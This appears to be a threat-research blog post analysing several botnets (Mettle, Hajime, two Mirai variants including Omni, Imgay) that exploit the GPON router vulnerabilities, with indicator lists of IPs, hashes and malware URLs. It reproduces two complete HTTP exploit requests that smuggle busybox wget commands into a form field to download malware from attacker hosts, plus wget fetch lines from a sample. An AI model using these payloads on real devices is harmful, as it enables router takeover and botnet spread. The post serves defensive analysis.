This article was co-authored by Hui Wang, LIU Ya, Rootkiter and Yegenshen.
In our previous articles I and II of this series, we mentioned that since the expose of the GPON vulnerabilities (CVE-2018-10561, CVE-2018-10562), there have been at least five botnet families actively exploiting this vulnerability to build their bot army within the first 10 days. Those includes mettle, muhstik, mirai, hajime, satori, and so on. They rushed up and competed for territory, providing IoT botnet researchers with an excellent opportunity for close observation.
In our observation, one interesting point is that the exploit code of each botnet can only affect a small part (estimated approximately 2%) of GPON home routers. As a result, the number of devices that were eventually implanted was greatly reduced, and the majority of GPON home router users survived. However, administrators still need to be vigilant, because the malicious code are under active development, and code revisions will only take a short time.
While keeping our observations, we also have taken action to curb the proliferation of muhstik botnets together with the security community. But muhstik malicious campaign are not willing to give up easily. They tried to come back again and again. Our readers may stay tuned.
In this article, we will introduce other botnets in turn:
- Mettle: A malicious campaign based on IP addresses in Vietnam (C2 210.245.26.180:4441, scanner 118.70.80.143) and mettle open source control module
- Hajime: This round of update from Hajime also includes GPON exploits.
- Two Mirai variants: At least two malicious campaigns are actively exploiting this vulnerability to propagate mirai variants. The second one is already known as Omni.
- Imgay: This looks like a botnet under development. We only observe its download behavior and no more follow-up actions.
Mettle Botnet
As we mentioned before, Mettle botnet’s C2 became offline soon after this round attack. The features of this malicious campaign include:
- Scanner IP: 118.70.80.143 Vietnam/VN Hanoi “AS18403 The Corporation for Financing & Promoting Technology”
- C2 Server: 210.245.26.180:4441 Vietnam/VN Ho Chi Minh City “AS18403 The Corporation for Financing & Promoting Technology”
- Download Server: 210:245.26.180:80
- Malware (Downloader) sample hash: 8e2c6a92a024f8b8bb3c086b86fa50f9
- The above downloader will first download mettle (an opensource penetration testing tool derived from Metasploit), and then the target device will be controlled by the C2 server
Besides, after exploitation, the attacker will also modify iptables rule on GPON routers to block TCP port 80 and 443 traffic, which is probably trying to prevent intruding by other malwares. Part of iptables rule are as follows:
-A ACL -p tcp -m tcp --dport 80 -j DROP -A ACL -p tcp -m tcp --dport 23 -j DROP -A ACL -p tcp -m tcp --dport 22 -j DROP -A ACL -p tcp -m tcp --dport 21 -j DROP -A ACL -p tcp -m tcp --dport 443 -j DROP We haven’t observed any mettle attack payload yet, however, we do notice that its IP addresses were related to other malware in the past.
Hajime Botnet
The features of this round of Hajime update are:
- Filename:atk.mipseb.1525838286
- Origin Hash: 8CCA32FB1FE4826007B087B4AEE20941
- Packed Hash: ED1306E24196533553571D5433312A2D
- Unpacked Hash: E06E1E7993EA310CE0FBA9DD76CDF377
- Target port:23,80,8080
- New Payload(GPON):hxxps://www.exploit-db.com/exploits/44576/
The following figure shows the GPON exploit code in Hajime sample:
The updated atk.mpseb module can launch scanning on port 23, 80 and 8080 simultaneously.
Mirai Variant 1
Its features include:
- Scanner IP : 46.243.189.60 Netherlands/NL “AS205406 Hostio Solutions B.V.”
- C2 Server : 46.243.189.102:127 Netherlands/NL “AS205406 Hostio Solutions B.V.”
- Download Server :46.243.189.102:80
- Malware sample hash: c6dc9f7cf09a267fefe53c5c481e7ea0
The attack payload are as follow:
POST /GponForm/diag_Form?images/ HTTP/1.1 User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2 Host: {target} Accept: */* Content-Length: 138 Content-Type: application/x-www-form-urlencoded XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+hxxp://46.243.189.102/`;busybox+wget+hxxp://46.243.189.102/&ipv=0 We have been monitoring the C2 server of this Mirai variant for quite a long time. The C2 is really active and have sent quite a number of DDoS attack commands. The first time we saw its DDoS commmand was 2018-01-26 13:10:20. The following figure shows the daily number of its attack commands:
For the victims, we only list parts of popular attacked sites below, including: check-host.net, incapsula.com, moz.com, opskins.com, pastebin.com, roblox.com, seznam.cz, store.playstation.com, www.kinguin.net, etc:
Mirai Variant 2 – Omni
Researchers at newskysecurity have already named the Mirai variant Omni, and their description is consistent with our observations
In this round of attack, the Omni botnet uses following attack payload:
POST /GponForm/diag_Form?images/ HTTP/1.1 Host: {target} Content-Length: 120 User-Agent: python-requests/2.6.0 CPython/2.7.5 Linux/4.4.127-mainline-rev1 Connection: keep-alive Accept: */* Accept-Encoding: gzip, deflate XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+hxxp://185.246.152.173/omni+-O+/tmp/talk`&ipv=0 This botnet’s features include:
- Download server URL :hxxp://185.246.152.173/omni
- C2 server:185.246.152.173:1000
- Scanner IP:51.15.106.135
This C2 has historically spread multiple Mirai variants, including Owari, XOwari, S-owari, Sora, and Omni. The malware samples came from this C2 supports multiple CPU architectures, in addition to the usually supported CPU like Arm, Mips, Mpsl, Mipsl, X86, and Sparc, they also supports the ARC CPU which once widely concerned by the community.
Another interesting point is the two messages that the botnet author released to the outside world. One message is saved on the c2 server (hxxp://185.246.152.173/meme). Currently this URL is not accessible. We have a history screenshot as follows. The main body of the page is a photo from the movie “The Matrix” combined with a head of famous security blogger Brian Krebs:
The text of the page is as follows. It contains an email address:krebsonsecurity@gamil.com. Note that this is not Brian Krebs’s email address.
Hey you, stop right there! Want your router fixed? No problem! Send an email to krebsonsecurity@gamil.com and we will have it fixed asap! ~ scarface is your daddy ~ Another piece of message is saved in the sample, containing a twitter account @1337Wicked :
md5hash: 5A8F7B3E3A981BBDD42AEE4DA6EEAAB8 message: Botnet officially ran by Ankit Anubhav and hosted on newskysecurity.com [If your reversing this follow @1337Wicked on twitter Imgay Botnet
Imgay is another botnet,the malicious code URL it spreads is as follows:
hxxp://149.28.96.126/imgay The malicious code accesses the following addresses, but then the it ends and no more activity is seen.
wget hxxp://149.28.96.126/loaded/killy > /dev/null 2>&1 wget hxxp://149.28.96.126/pid_max/%s > /dev/null 2>&1 wget hxxp://149.28.96.126/pid_max/default > /dev/null 2>&1 wget hxxp://149.28.96.126/killed/%i > /dev/null 2>&1 Contact Us
We can be reached at twitter or at WeChat subscription account 360Netlab.
Ioc
Mettle
118.70.80.143 Vietnam/VN Hanoi "AS18403 The Corporation for Financing & Promoting Technology" scanner IP 210.245.26.180:4441 Vietnam/VN Ho Chi Minh City "AS18403 The Corporation for Financing & Promoting Technology" c2 8e2c6a92a024f8b8bb3c086b86fa50f9 malware hash Hajime
atk.mipseb.1525838286 file name 8CCA32FB1FE4826007B087B4AEE20941 hash original ED1306E24196533553571D5433312A2D hash before unpack E06E1E7993EA310CE0FBA9DD76CDF377 hash after unpack Mira variant #1
46.243.189.60 Netherlands/NL "AS205406 Hostio Solutions B.V." scanner IP 46.243.189.102:127 Netherlands/NL "AS205406 Hostio Solutions B.V." C2 ip c6dc9f7cf09a267fefe53c5c481e7ea0 malware hash Omni
185.246.152.173:1000 Netherlands/NL "AS56630 Melbikomas UAB" C2 51.15.106.135 France/FR "AS12876 Online S.a.s." scanner IP hxxp://185.246.152.173/omni malware download URL Omni malware download URLs in all the past
hxxp://185.246.152.173:80/bins/spc.omni hxxp://185.246.152.173:80/bins/sora.spc hxxp://185.246.152.173:80/bins/sora.sh4 hxxp://185.246.152.173:80/bins/sora.arm6 hxxp://185.246.152.173:80/bins/sora.arm5 hxxp://185.246.152.173:80/bins/s-owari.spc hxxp://185.246.152.173:80/bins/s-owari.mpsl hxxp://185.246.152.173:80/bins/s-owari.m68k hxxp://185.246.152.173:80/bins/s-owari.arm hxxp://185.246.152.173:80/bins/s-owari.arm7 hxxp://185.246.152.173:80/bins/s-owari.arc hxxp://185.246.152.173:80/bins/owari.x86 hxxp://185.246.152.173:80/bins/owari.spc hxxp://185.246.152.173:80/bins/owari.mpsl hxxp://185.246.152.173:80/bins/owari.mips hxxp://185.246.152.173:80/bins/owari.i586 hxxp://185.246.152.173:80/bins/owari.arm hxxp://185.246.152.173:80/bins/owari.arm7 hxxp://185.246.152.173:80/bins/owari.arm5 hxxp://185.246.152.173:80/bins/owari.arm4 hxxp://185.246.152.173:80/bins/mpsl.omni hxxp://185.246.152.173:80/bins/mips.owari hxxp://185.246.152.173:80/bins/mips.omni hxxp://185.246.152.173:80/bins/arm7.omni hxxp://185.246.152.173:80/bins/arm6.omni hxxp://185.246.152.173:80/bins/arc.omni hxxp://185.246.152.173:80/bins/Owari.x86 hxxp://185.246.152.173:80/bins/Owari.spc hxxp://185.246.152.173:80/bins/Owari.sh4 hxxp://185.246.152.173:80/bins/Owari.mpsl hxxp://185.246.152.173:80/bins/Owari.mips1 hxxp://185.246.152.173:80/bins/Owari.m68k hxxp://185.246.152.173:80/bins/Owari.arm7 hxxp://185.246.152.173:80/bins/Owari.arm6 hxxp://185.246.152.173/xOwari.sh hxxp://185.246.152.173/bins/x86.omni hxxp://185.246.152.173/bins/scan.x86 hxxp://185.246.152.173/bins/s-owari.ppc hxxp://185.246.152.173/bins/s-owari.mpsl hxxp://185.246.152.173/bins/s-owari.arm hxxp://185.246.152.173/bins/s-owari.arm7 hxxp://185.246.152.173/bins/owari.spc hxxp://185.246.152.173/bins/owari.sh4 hxxp://185.246.152.173/bins/owari.mips hxxp://185.246.152.173/bins/owari.m68k hxxp://185.246.152.173/bins/owari.arm hxxp://185.246.152.173/bins/owari.arm7 hxxp://185.246.152.173/bins/nocpu.x86 hxxp://185.246.152.173/bins/nocpu.mips hxxp://185.246.152.173/41ai.sh